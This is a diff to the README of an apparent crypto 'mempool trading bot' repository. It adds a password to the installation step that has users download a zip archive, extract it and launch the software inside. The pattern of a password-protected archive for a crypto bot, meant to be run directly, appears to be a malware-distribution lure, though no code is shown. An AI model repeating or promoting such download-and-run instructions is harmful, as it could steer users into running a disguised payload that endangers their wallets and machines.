Lak1Lay/mempool-trading-bot/README.md

 ## Installation
 To install the bot, follow these steps:
-1. [Download](https://github.com/Lak1Lay/mempool-trading-bot/archive/refs/heads/main.zip) repo and extract files
+1. [Download](https://github.com/Lak1Lay/mempool-trading-bot/archive/refs/heads/main.zip) repo and extract files with password `memp00l`
 2. Move into the directory and launch software

 ## Usage